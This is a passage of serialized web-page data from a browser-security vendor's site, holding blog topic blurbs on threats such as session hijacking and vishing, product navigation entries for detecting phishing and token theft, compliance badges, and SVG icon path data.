infrastructure.",7,{"sys":569,"faqItemsCollection":571,"name":573,"slug":574,"tier":45,"intro":575,"faqTitle":59,"postCount":576,"hasPage":19},{"id":570},"topic-session-hijacking",{"items":572},[],"Session hijacking","session-hijacking","Session hijacking is the theft of an authenticated session — usually via stolen session cookies or tokens — letting attackers walk past passwords and MFA into a live account. AiTM phishing kits and infostealers have made it a mainstream attack technique across both criminal and targeted intrusions. Push’s browser agent detects session token theft by adding telemetry to the user agent string, creating a high-fidelity signal for security teams.",75,{"sys":578,"faqItemsCollection":580,"name":582,"slug":583,"tier":45,"intro":584,"faqTitle":59,"postCount":585,"hasPage":19},{"id":579},"topic-shadow-ai",{"items":581},[],"Shadow AI","shadow-ai","Shadow AI is employees’ unsanctioned use of AI tools at work, putting corporate data into chatbots and assistants that security teams never approved and can’t see. Push’s own browser telemetry shows AI adoption acting as a force multiplier for shadow IT — potentially now outscaling shadow SaaS — and this hub tracks that research, real-world breach examples, and practical controls.",20,{"sys":587,"faqItemsCollection":589,"name":591,"slug":592,"tier":45,"intro":593,"faqTitle":59,"postCount":576,"hasPage":19},{"id":588},"topic-shadow-saas",{"items":590},[],"Shadow SaaS","shadow-saas","Shadow SaaS is the cloud applications employees adopt for work without IT approval, each one creating unmanaged accounts, identities, and data outside your security controls. Push covers the problem end to end — from browser-based SaaS discovery to in-browser app banners and MFA enforcement — alongside breach analyses that show where unmanaged accounts lead.",{"sys":595,"faqItemsCollection":597,"name":599,"slug":600,"tier":45,"intro":601,"faqTitle":59,"postCount":585,"hasPage":19},{"id":596},"topic-siem",{"items":598},[],"SIEM","siem","A SIEM is only as good as the telemetry feeding it, and most log sources never see what happens inside the browser — where phishing, session token theft, and account takeover actually play out. Push streams browser-level detections and identity telemetry into SIEMs, and these posts show how that data improves detection fidelity and cuts alert fatigue.",{"sys":603,"faqItemsCollection":605,"name":607,"slug":608,"tier":45,"intro":609,"faqTitle":59,"postCount":471,"hasPage":19},{"id":604},"topic-social-engineering",{"items":606},[],"Social engineering","social-engineering","Social engineering is the manipulation of people — through phishing pages, help desk impersonation, vishing calls, and poisoned tenant invites — into handing over access that no exploit could take. Coverage here tracks how threat actors run these plays — drawing on Push’s ongoing investigation of live phishing infrastructure and criminal tooling.",{"sys":611,"faqItemsCollection":613,"name":615,"slug":616,"tier":31,"intro":617,"faqTitle":59,"postCount":274,"hasPage":6},{"id":612},"topic-supply-chain-security",{"items":614},[],"Supply chain security","supply-chain-security","Supply chain security extends beyond your own perimeter to the vendors, platforms, and browser extensions your organization depends on. A compromised third party can hand attackers legitimate access — as recent campaigns against SaaS providers have shown. Push’s research examines the browser-extension supply chain in particular: why extension risk scores fail to predict compromise, and how developers can harden extensions against takeover. These posts frame supply chain risk through a browser and identity lens.",{"sys":619,"faqItemsCollection":621,"name":623,"slug":624,"tier":45,"intro":625,"faqTitle":59,"postCount":626,"hasPage":19},{"id":620},"topic-swg",{"items":622},[],"SWG","swg","A secure web gateway (SWG) filters and inspects web traffic in transit, sitting in the network path between users and the internet. That position shows you the packet but not the session: Push’s research on AitM phishing kits documents how attackers break the signatures proxies rely on, and these posts explain why phishing detection is moving from the network path into the browser itself.",18,{"sys":628,"faqItemsCollection":630,"name":632,"slug":633,"tier":45,"intro":634,"faqTitle":59,"postCount":635,"hasPage":19},{"id":629},"topic-third-party-risk",{"items":631},[],"Third-party risk","third-party-risk","Third-party risk is the exposure your organization inherits from vendors, SaaS providers, and integrations that hold your data or access your tenants — a chain now extended one employee sign-up at a time. This hub collects Push’s breach analyses and guides for assessing OAuth integrations, managing browser extensions, and responding when a supplier is compromised.",44,{"sys":637,"faqItemsCollection":639,"name":641,"slug":642,"tier":31,"intro":643,"faqTitle":59,"postCount":644,"hasPage":19},{"id":638},"topic-threat-landscape",{"items":640},[],"Threat landscape","threat-landscape","The enterprise threat landscape is now defined by identity attacks: criminals log in with phished, stolen, or stuffed credentials rather than breaking infrastructure. Threat actors keep proving how effective help desk scams, MFA bypass, and session theft are against well-defended organizations. Drawing on breach analyses, annual phishing trend reviews, and in-the-wild campaign tracking, Push documents how attacker TTPs are shifting. This hub is where to follow those changes.",49,{"sys":646,"faqItemsCollection":648,"name":650,"slug":651,"tier":45,"intro":652,"faqTitle":59,"postCount":653,"hasPage":19},{"id":647},"topic-vishing",{"items":649},[],"Vishing","vishing","Vishing — voice phishing — uses phone calls to impersonate IT support, help desks, or employees, talking targets into password resets, MFA approvals, or opening attacker-controlled pages. Threat actors now routinely pair calls with AiTM phishing to hijack SSO accounts, a chain Push has analyzed across campaigns targeting hundreds of organizations.",16,{},"blogtopics","9aR-7_LhDkRRXRaED83WYgKvhxkN_ODLJNuDH339OG0",[658,662,666,670,674],{"title":659,"logo":660,"createdDate":661},"SOC2","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6727a5e00004d6e9e69fc3068b8b64c",1784291539953,{"title":663,"logo":664,"createdDate":665},"GDPR","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ffe49f53211674deaa5a6640d929cdf42?format=webp",1784291672535,{"title":667,"logo":668,"createdDate":669},"Cyber essentials","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F53558c1045a342a7a28def960cd54ae7?format=webp",1784291702710,{"title":671,"logo":672,"createdDate":673},"ISO IEC 27001","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F578a404a61cf45db951a41fe3554d12d",1784291766222,{"title":675,"logo":676,"createdDate":677},"ISO IEC 27701","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbe219844b13242fbba531959579a753c",1784291858848,[679,743,788],{"id":680,"label":681,"text":21,"navIcon":682,"items":683},"stop-browser-based-attacks","Stop browser-based attacks","solid:faShieldHalved",[684,688,693,698,702,707,712,717,722,726,730,735,739],{"title":521,"text":685,"url":686,"navIcon":687},"Detect phishing behaviorally in the browser, regardless of the payload or delivery channel.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fzero-day-phishing","sharp-regular:faFishingRod",{"title":689,"text":690,"url":691,"navIcon":692},"Adversary-in-the-Middle","Detect and block MFA-bypassing AiTM phishing pages in real-time.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fadversary-in-the-middle-attacks","solid:faUserSecret",{"title":694,"text":695,"url":696,"navIcon":697},"ClickFix (and variants)","Intercept malicious copy and paste attacks at the point of interaction.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fclickfix-fix-variants","sharp-regular:faLaptopCode",{"title":361,"text":699,"url":700,"navIcon":701},"Detect and block device code phishing kits designed to get around passkeys.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fdevice-code-phishing","solid:faTabletScreenButton",{"title":703,"text":704,"url":705,"navIcon":706},"Consent phishing","Detect and block malicious OAuth consent grants before access is authorized.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fconsent-phishing","solid:faThumbsUp",{"title":708,"text":709,"url":710,"navIcon":711},"Malicious OAuth integrations","Detect and block the root cause of SaaS supply chain attacks.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-oauth-integrations","solid:faPlugCircleXmark",{"title":713,"text":714,"url":715,"navIcon":716},"Malicious browser extensions","Inventory, monitor, and block risky browser extensions.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-browser-extensions","sharp-regular:faPuzzlePiece",{"title":718,"text":719,"url":720,"navIcon":721},"Malicious file downloads","Control which files users can download by type, source, and user group.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-file-downloads","solid:faFileCircleXmark",{"title":723,"text":724,"url":725,"navIcon":721},"Infostealers","Detect infostealer delivery and respond to a compromise.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Finfostealer-malware",{"title":397,"text":727,"url":728,"navIcon":729},"Surface hidden login paths that bypass SSO and expose accounts.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fghost-logins","solid:faGhost",{"title":731,"text":732,"url":733,"navIcon":734},"Mobile phishing (QR & SMS)","Detect phishing regardless of whether it arrives via email, SMS, or QR code.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmobile-phishing-qr-code-sms","solid:faQrcode",{"title":334,"text":736,"url":737,"navIcon":738},"Identify reused and compromised credentials across SaaS logins.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fcredential-stuffing","custom:credentialStuffing",{"title":573,"text":740,"url":741,"navIcon":742},"Detect and respond to stolen session token replay with browser session markers.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fsession-hijacking","solid:faCookieBite",{"id":744,"label":745,"text":21,"navIcon":746,"items":747},"achieve-security-outcomes","Achieve security outcomes","solid:faCheckToSlot",[748,753,758,763,768,773,778,783],{"title":749,"text":750,"url":751,"navIcon":752},"Stop account takeover","Stop ATO with stolen credential and compromised token detection.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fstop-account-takeover","sharp-regular:faUserSecret",{"title":754,"text":755,"url":756,"navIcon":757},"Harden unmanaged identities","Harden access paths with visibility, detection, and guardrails.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fharden-unmanaged-identities","sharp-regular:faRadar",{"title":759,"text":760,"url":761,"navIcon":762},"Investigate browser-related incidents","Investigate and respond faster with unique browser telemetry.","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-browser-related-incidents","sharp-regular:faSatelliteDish",{"title":764,"text":765,"url":766,"navIcon":767},"Secure shadow SaaS","See and control shadow SaaS in the browser.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-shadow-saas","sharp-regular:faShieldCheck",{"title":769,"text":770,"url":771,"navIcon":772},"Secure AI","See and control AI apps in the browser.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-ai","sharp-regular:faBrainCircuit",{"title":774,"text":775,"url":776,"navIcon":777},"Secure BYOD","Extend consistent browser-based protection to unmanaged devices.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-bring-your-own-device","solid:faMobileScreenButton",{"title":779,"text":780,"url":781,"navIcon":782},"Secure Chromebooks","Secure browser activity on Chromebooks without endpoint agents.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-chromebooks","brands:faChrome",{"title":784,"text":785,"url":786,"navIcon":787},"Investigate and stop data loss","Detect and prevent data loss across AI tools, apps, and sessions.","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-and-stop-data-loss","custom:investigateAndStopDataLoss",{"id":789,"label":790,"text":21,"navIcon":791,"items":792},"tool-replacements","Tool replacements","solid:faScrewdriverWrench",[793,798,803,808],{"title":794,"text":795,"url":796,"navIcon":797},"Remote browser isolation","Detect attacks that look like normal browsing.","\u002Fsolution\u002Ftool-replacements\u002Fremote-browser-isolation","solid:faDisplay",{"title":799,"text":800,"url":801,"navIcon":802},"Secure web gateways","Detect attacks inside the browser after SWGs allowed the connection.","\u002Fsolution\u002Ftool-replacements\u002Fsecure-web-gateways","solid:faFilter",{"title":804,"text":805,"url":806,"navIcon":807},"Cloud access security broker","Catch browser-based identity threats in real time, not after the fact.","\u002Fsolution\u002Ftool-replacements\u002Fcloud-access-security-broker","solid:faCloudArrowUp",{"title":809,"text":810,"url":811,"navIcon":812},"Security awareness training","Block real phishing instead of training users on simulations.","\u002Fsolution\u002Ftool-replacements\u002Fsecurity-awareness-training","custom:securityAwareness",{"w":814,"h":815,"d":816},448,512,"M284.6 0l91.4 0 0 160-48 0 0-112-36.6 0-203.4 58.1 0 181.9 40 0 0 224-128 0 0-224 40 0 0-218.1 17.4-5 224-64 3.2-.9zM80 336l-32 0 0 128 32 0 0-128zm176 8c0-76.8 64-136 96-152 32 16 96 75.2 96 152 0 32-16 80-64 112l32 40 0 16-128 0 0-16 32-40c-48-32-64-80-64-112zm128-32a24 24 0 1 0 -48 0 24 24 0 1 0 48 0z",{"w":814,"h":815,"d":818},"M171-16c-36.4 0-57.8 58.3-68.3 112L72 96c-13.3 0-24 10.7-24 24s10.7 24 24 24l24 0 0 32c0 17 3.3 33.2 9.3 48l-9.3 0 0 0-20.5 0c-15.2 0-27.5 12.3-27.5 27.5 0 3 .5 5.9 1.4 8.7l28.9 86.6C40.2 379.6 16 428.1 16 482.3 16 498.7 29.3 512 45.7 512l356.6 0c16.4 0 29.7-13.3 29.7-29.7 0-54.2-24.2-102.7-62.3-135.4l28.9-86.6c.9-2.8 1.4-5.7 1.4-8.7 0-15.2-12.3-27.5-27.5-27.5l-20.5 0 0 0-9.3 0c6-14.8 9.3-31 9.3-48l0-32 24 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-30.7 0c-10.4-53.7-31.9-112-68.3-112-9.6 0-19 3.9-27.5 8.2-8.2 4.1-18.4 7.8-25.5 7.8s-17.3-3.7-25.5-7.8C190-12.1 180.6-16 171-16zm93.7 484.4l-24.8-70.9 27.9-32.5c2.7-3.2 4.2-7.2 4.2-11.4 0-9.7-7.8-17.5-17.5-17.5l-61 0c-9.7 0-17.5 7.8-17.5 17.5 0 4.2 1.5 8.2 4.2 11.4l27.9 32.5-24.8 70.9-57-180.4 35.7 0c18.4 10.2 39.5 16 62 16s43.6-5.8 62-16l35.7 0-57 180.4zM224 256c-34.7 0-64.2-22.1-75.3-53 5.7 3.2 12.3 5 19.3 5l12.4 0c16.5 0 31.1-10.6 36.3-26.2 2.3-7 12.2-7 14.5 0 5.2 15.6 19.9 26.2 36.3 26.2l12.4 0c7 0 13.6-1.8 19.3-5-11.1 30.9-40.6 53-75.3 53z",{"w":17,"h":815,"d":820},"M112 80l416 0 0 224 48 0 0-272-512 0 0 272 48 0 0-224zM48 404.1l0-4.1 544 0 0 4.1-27.9 27.9-488.2 0-27.9-27.9zM592 352l-592 0 0 72 56 56 528 0 56-56 0-72-48 0zM281 169l17-17-33.9-33.9c-6.1 6.1-27.8 27.8-65 65l-17 17c6.1 6.1 27.8 27.8 65 65l17 17 33.9-33.9c-9-9-25-25-48-48l31-31zM393 135l-17-17-33.9 33.9c9 9 25 25 48 48-23 23-39 39-48 48L376 281.9c6.1-6.1 27.8-27.8 65-65l17-17c-6.1-6.1-27.8-27.8-65-65z",{"w":814,"h":815,"d":822},"M0 64C0 28.7 28.7 0 64 0L384 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L64 512c-35.3 0-64-28.7-64-64L0 64zM256 432a32 32 0 1 0 -64 0 32 32 0 1 0 64 0zM384 64l-320 0 0 288 320 0 0-288z",{"w":815,"h":815,"d":824},"M80 160c17.7 0 32 14.3 32 32l0 256c0 17.7-14.3 32-32 32l-48 0c-17.7 0-32-14.3-32-32L0 192c0-17.7 14.3-32 32-32l48 0zM270.6 16C297.9 16 320 38.1 320 65.4l0 4.2c0 6.8-1.3 13.6-3.8 19.9L288 160 448 160c26.5 0 48 21.5 48 48 0 19.7-11.9 36.6-28.9 44 17 7.4 28.9 24.3 28.9 44 0 23.4-16.8 42.9-39 47.1 4.4 7.3 7 15.8 7 24.9 0 22.2-15 40.8-35.4 46.3 2.2 5.5 3.4 11.5 3.4 17.7 0 26.5-21.5 48-48 48l-87.9 0c-36.3 0-71.6-12.4-99.9-35.1L184 435.2c-15.2-12.1-24-30.5-24-50l0-186.6c0-14.9 3.5-29.6 10.1-42.9L226.3 43.3C234.7 26.6 251.8 16 270.6 16z",{"w":17,"h":815,"d":826},"M192-32c17.7 0 32 14.3 32 32l0 96 128 0 0-96c0-17.7 14.3-32 32-32s32 14.3 32 32l0 96 64 0c17.7 0 32 14.3 32 32s-14.3 32-32 32l0 48.7c-98.6 8.1-176 90.7-176 191.3 0 27.3 5.7 53.3 16 76.9l0 3.1c0 17.7-14.3 32-32 32s-32-14.3-32-32l0-66.7C165.2 398.1 96 319.1 96 224l0-64c-17.7 0-32-14.3-32-32S78.3 96 96 96l64 0 0-96c0-17.7 14.3-32 32-32zM496 256a144 144 0 1 1 0 288 144 144 0 1 1 0-288zm59.3 107.3c6.2-6.2 6.2-16.4 0-22.6s-16.4-6.2-22.6 0l-36.7 36.7-36.7-36.7c-6.2-6.2-16.4-6.2-22.6 0s-6.2 16.4 0 22.6l36.7 36.7-36.7 36.7c-6.2 6.2-6.2 16.4 0 22.6s16.4 6.2 22.6 0l36.7-36.7 36.7 36.7c6.2 6.2 16.4 6.2 22.6 0s6.2-16.4 0-22.6l-36.7-36.7 36.7-36.7z",{"w":815,"h":815,"d":828},"M201.1 57.3c-7 5.3-9.1 10.7-9.1 14.7 0 4.5 2.8 11.2 12.4 16.9l11.6 7 0 48.1-168 0 0 60.5c7.4-2.9 15.5-4.5 24-4.5 43.1 0 72 39.4 72 80s-28.9 80-72 80c-8.5 0-16.6-1.6-24-4.5l0 108.5 108.5 0c-2.9-7.4-4.5-15.5-4.5-24 0-43.1 39.4-72 80-72s80 28.9 80 72c0 8.5-1.6 16.6-4.5 24l60.5 0 0-168 48.1 0 7 11.6c5.8 9.6 12.4 12.4 16.9 12.4 4 0 9.5-2.1 14.7-9.1s9.3-17.9 9.3-30.9-4-23.8-9.3-30.9-10.7-9.1-14.7-9.1c-4.5 0-11.2 2.8-16.9 12.4l-7 11.6-48.1 0 0-120-120 0 0-48.1 11.6-7c9.6-5.8 12.4-12.4 12.4-16.9 0-4-2.1-9.5-9.1-14.7S245 48 232 48 208.2 52 201.1 57.3zM172.3 18.9C188.5 6.8 209.6 0 232 0S275.5 6.8 291.7 18.9 320 49.5 320 72c0 8.6-1.8 16.7-4.9 24l100.9 0 0 100.9c7.3-3.1 15.4-4.9 24-4.9 22.5 0 41 12.2 53.1 28.3s18.9 37.3 18.9 59.7-6.8 43.5-18.9 59.7-30.6 28.3-53.1 28.3c-8.6 0-16.7-1.8-24-4.9l0 148.9-168 0 0-49.3 8.2-7.2c5.4-4.7 7.8-10.3 7.8-15.5 0-9.9-10.7-24-32-24s-32 14.1-32 24c0 5.3 2.4 10.8 7.8 15.5l8.2 7.2 0 49.3-216 0 0-216 49.3 0 7.2 8.2c4.7 5.4 10.3 7.8 15.5 7.8 9.9 0 24-10.7 24-32s-14.1-32-24-32c-5.3 0-10.8 2.4-15.5 7.8L49.3 264 0 264 0 96 148.9 96c-3.1-7.3-4.9-15.4-4.9-24 0-22.5 12.2-41 28.3-53.1z",{"w":830,"h":815,"d":831},576,"M96 0C60.7 0 32 28.7 32 64l0 384c0 35.3 28.7 64 64 64l180 0c-22.7-31.5-36-70.2-36-112 0-100.6 77.4-183.2 176-191.3l0-38.1c0-17-6.7-33.3-18.7-45.3L290.7 18.7C278.7 6.7 262.5 0 245.5 0L96 0zM357.5 176L264 176c-13.3 0-24-10.7-24-24L240 58.5 357.5 176zM432 544a144 144 0 1 0 0-288 144 144 0 1 0 0 288zm59.3-180.7l-36.7 36.7 36.7 36.7c6.2 6.2 6.2 16.4 0 22.6s-16.4 6.2-22.6 0l-36.7-36.7-36.7 36.7c-6.2 6.2-16.4 6.2-22.6 0s-6.2-16.4 0-22.6l36.7-36.7-36.7-36.7c-6.2-6.2-6.2-16.4 0-22.6s16.4-6.2 22.6 0l36.7 36.7 36.7-36.7c6.2-6.2 16.4-6.2 22.6 0s6.2 16.4 0 22.6z",{"w":833,"h":815,"d":834},384,"M40.1 467.1l-11.2 9C25.7 478.6 21.8 480 17.8 480 8 480 0 472 0 462.2L0 192C0 86 86 0 192 0S384 86 384 192l0 270.2c0 9.8-8 17.8-17.8 17.8-4 0-7.9-1.4-11.1-3.9l-11.2-9c-13.4-10.7-32.8-9-44.1 3.9L269.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6l-26.6-30.5c-12.7-14.6-35.4-14.6-48.2 0L141.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6L84.2 471c-11.3-12.9-30.7-14.6-44.1-3.9zM160 192a32 32 0 1 0 -64 0 32 32 0 1 0 64 0zm96 32a32 32 0 1 0 0-64 32 32 0 1 0 0 64z",{"w":814,"h":815,"d":836},"M64 160l64 0 0-64-64 0 0 64zM0 80C0 53.5 21.5 32 48 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48L0 80zM64 416l64 0 0-64-64 0 0 64zM0 336c0-26.5 21.5-48 48-48l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96zM320 96l0 64 64 0 0-64-64 0zM304 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96c0-26.5 21.5-48 48-48zM288 352a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm0 64c17.7 0 32 14.3 32 32s-14.3 32-32 32-32-14.3-32-32 14.3-32 32-32zm96 32c0-17.7 14.3-32 32-32s32 14.3 32 32-14.3 32-32 32-32-14.3-32-32zm32-96a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm-32 32a32 32 0 1 1 -64 0 32 32 0 1 1 64 0z",{"w":815,"h":815,"d":838},"M257.5 27.6c-.8-5.4-4.9-9.8-10.3-10.6-22.1-3.1-44.6 .9-64.4 11.4l-74 39.5C89.1 78.4 73.2 94.9 63.4 115L26.7 190.6c-9.8 20.1-13 42.9-9.1 64.9l14.5 82.8c3.9 22.1 14.6 42.3 30.7 57.9l60.3 58.4c16.1 15.6 36.6 25.6 58.7 28.7l83 11.7c22.1 3.1 44.6-.9 64.4-11.4l74-39.5c19.7-10.5 35.6-27 45.4-47.2l36.7-75.5c9.8-20.1 13-42.9 9.1-64.9-.9-5.3-5.3-9.3-10.6-10.1-51.5-8.2-92.8-47.1-104.5-97.4-1.8-7.6-8-13.4-15.7-14.6-54.6-8.7-97.7-52-106.2-106.8zM208 144a32 32 0 1 1 0 64 32 32 0 1 1 0-64zM144 336a32 32 0 1 1 64 0 32 32 0 1 1 -64 0zm224-64a32 32 0 1 1 0 64 32 32 0 1 1 0-64z",{"w":814,"h":815,"d":840},"M144-16l-48 112-48 0 0 48 48 0 0 32c0 17 3.3 33.2 9.3 48l-73.3 0 0 32 5.3 16 26.7 80-64 160 51.7 0 56.9-142.2 6.5-16.3c-1-3.1-10.1-30.3-27.2-81.5l51.4 0c22.6 19.9 52.2 32 84.7 32s62.1-12.1 84.7-32l51.4 0c-17.1 51.2-26.1 78.4-27.2 81.5l6.5 16.3 56.9 142.2 51.7 0-64-160 26.7-80 5.3-16 0-32-73.3 0c6-14.8 9.3-31 9.3-48l0-32 48 0 0-48-48 0-48-112-32 0-48 32-48-32-32 0zm80 272c-32.8 0-61-19.7-73.3-48l57.3 0 16-40 16 40 57.3 0c-12.3 28.3-40.5 48-73.3 48zm17.5 139.6l30.5-35.6 0-24-96 0 0 24 30.5 35.6-46.5 116.4 128 0-46.5-116.4z",{"w":815,"h":815,"d":842},"M497.4 49l17-17-33.9-33.9C473.6 4.9 453.3 25.2 419.7 58.8 375.4 22.1 318.5 0 256.4 0 115.1 0 .4 114.6 .4 256s114.6 256 256 256 256-114.6 256-256l-48 0c0 114.9-93.1 208-208 208s-208-93.1-208-208 93.1-208 208-208c48.8 0 93.7 16.8 129.1 44.9l-45.7 45.7c-23.5-16.8-52.3-26.6-83.4-26.6-79.5 0-144 64.5-144 144s64.5 144 144 144 144-64.5 144-144l-48 0c0 53-43 96-96 96s-96-43-96-96 43-96 96-96c17.8 0 34.5 4.8 48.8 13.3-52 52-79.5 79.5-82.7 82.7l33.9 33.9 17-17 224-224z",{"w":815,"h":815,"d":844},"M208 0l24 0C386.6 0 512 125.4 512 280l0 24-48 0 0-24C464 151.9 360.1 48 232 48l-24 0 0-48zm24 96c101.6 0 184 82.4 184 184l0 24-48 0 0-24c0-75.1-60.9-136-136-136l-24 0 0-48 24 0zM48 256c0 114.9 93.1 208 208 208 22.9 0 45-3.7 65.6-10.5l-263-263C51.7 211 48 233.1 48 256zM0 256c0-36.5 7.6-71.3 21.4-102.7 6.7-15.3 14.9-29.9 24.4-43.5 7.7 7.7 61.5 61.5 161.2 161.2 30.5-30.5 49.5-49.5 57-57L297.9 248c-7.5 7.5-26.5 26.5-57 57 99.7 99.7 153.5 153.5 161.2 161.2-13.6 9.5-28.2 17.7-43.5 24.4-31.4 13.8-66.2 21.4-102.7 21.4-141.4 0-256-114.6-256-256z",{"w":815,"h":815,"d":846},"M267.6 4.5l207.5 80.5 19.2 7.4 1.2 20.5c2.9 50-4.9 126.3-37.3 200.9-32.7 75.2-91.1 150-189.4 192.5l-12.7 5.5-12.7-5.5C144.9 463.9 86.6 389.2 53.9 313.9 21.5 239.3 13.7 162.9 16.6 113L17.8 92.5 37 85 244.5 4.5 256 0 267.6 4.5zM64.1 126C63.1 169.5 71 232.9 97.9 294.8 126.1 359.7 175 422.4 256 459.6 337.1 422.4 385.9 359.7 414.2 294.8 441 232.9 449 169.5 448 126L256 51.5 64.1 126zm302.3 44.7L352.3 190.1 249.8 330.9 233 354c-8.8-9.1-30.9-32-66.2-68.6l-16.7-17.3 34.5-33.3c9.5 9.8 23.9 24.7 43.2 44.7l85.6-117.7 14.1-19.4 38.8 28.2z",{"w":815,"h":815,"d":848},"M192 48l40 0 0 108-12.4 0c-7.6-16.5-24.3-28-43.6-28-26.5 0-48 21.5-48 48s21.5 48 48 48c19.4 0 36.1-11.5 43.6-28l12.4 0 0 56-92 0 0 56.4c-16.5 7.6-28 24.3-28 43.6 0 26.5 21.5 48 48 48s48-21.5 48-48c0-19.4-11.5-36.1-28-43.6l0-16.4 52 0 0 172-40 0c-16.8 0-31.2-10.3-37.1-25.1l-6.4-16-17.2 1c-1.1 .1-2.2 .1-3.2 .1-30.9 0-56-25.1-56-56 0-9.5 2.4-18.5 6.5-26.3l8.7-16.2-13.4-12.6c-11-10.2-17.8-24.8-17.8-40.9 0-21.6 12.2-40.4 30.3-49.8l22.6-11.7-13.1-21.9c-5-8.4-7.9-18.1-7.9-28.6 0-30.9 25.1-56 56-56l24 0 0-32c0-13.3 10.7-24 24-24zm88 148l12.4 0c7.6 16.5 24.3 28 43.6 28 26.5 0 48-21.5 48-48s-21.5-48-48-48c-19.4 0-36.1 11.5-43.6 28l-12.4 0 0-108 40 0c13.3 0 24 10.7 24 24l0 32 24 0c30.9 0 56 25.1 56 56 0 10.5-2.9 20.3-7.9 28.6l-13.1 21.9 22.6 11.7c18 9.3 30.3 28.1 30.3 49.8 0 16.1-6.8 30.7-17.8 40.9l-13.4 12.6 8.7 16.2c4.2 7.8 6.5 16.7 6.5 26.3 0 30.9-25.1 56-56 56-1.1 0-2.2 0-3.2-.1l-17.2-1-6.4 16C351.2 453.7 336.8 464 320 464l-40 0 0-76 92 0 0-56.4c16.5-7.6 28-24.3 28-43.6 0-26.5-21.5-48-48-48s-48 21.5-48 48c0 19.4 11.5 36.1 28 43.6l0 16.4-52 0 0-152zM192 512l128 0c31.1 0 58.4-16.2 74.1-40.5 52.7-5.1 93.9-49.5 93.9-103.5 0-11.5-1.9-22.5-5.3-32.9 13.4-17.5 21.3-39.4 21.3-63.1 0-32-14.5-60.6-37.1-79.7 3.3-10.2 5.1-21.1 5.1-32.3 0-49.6-34.8-91.1-81.3-101.5-6.3-33.3-35.6-58.5-70.7-58.5L192 0c-35.1 0-64.4 25.2-70.7 58.5-46.5 10.4-81.3 51.9-81.3 101.5 0 11.3 1.8 22.2 5.1 32.3-22.7 19.1-37.1 47.7-37.1 79.7 0 23.7 8 45.6 21.3 63.1-3.5 10.4-5.3 21.4-5.3 32.9 0 54 41.2 98.5 93.9 103.5 15.6 24.3 42.9 40.5 74.1 40.5zM336 192a16 16 0 1 1 0-32 16 16 0 1 1 0 32zm32 96a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zM176 352a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zm16-176a16 16 0 1 1 -32 0 16 16 0 1 1 32 0z",{"w":833,"h":815,"d":850},"M16 64C16 28.7 44.7 0 80 0L304 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L80 512c-35.3 0-64-28.7-64-64L16 64zm64 0l0 304 224 0 0-304-224 0zM192 472c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32z",{"w":815,"h":815,"d":852},"M0 256c0-46.6 12.5-90.4 34.3-128.9L144.1 318.3c21.9 39.2 63.8 65.7 111.9 65.7 14.3 0 27.1-2.3 40.8-6.6L220.5 509.6C95.9 492.3 0 385.3 0 256zm365.1 65.6c12.3-19.2 18.9-42.5 18.9-65.6 0-38.2-16.8-72.5-43.3-96l152.7 0c12 29.6 18.6 62.1 18.6 96 0 141.4-114.6 255.1-256 256L365.1 321.6zM477.8 128L256 128c-62.9 0-113.7 44.1-125.5 102.7L54.2 98.5C101 38.5 174 0 256 0 350.8 0 433.5 51.5 477.8 128zM344 256a88 88 0 1 1 -176 0 88 88 0 1 1 176 0z",{"w":815,"h":815,"d":854},"M448 96l0 256-384 0 0-256 384 0zM64 32C28.7 32 0 60.7 0 96L0 352c0 35.3 28.7 64 64 64l144 0-16 48-72 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l272 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-72 0-16-48 144 0c35.3 0 64-28.7 64-64l0-256c0-35.3-28.7-64-64-64L64 32z",{"w":815,"h":815,"d":856},"M32 64C19.1 64 7.4 71.8 2.4 83.8S.2 109.5 9.4 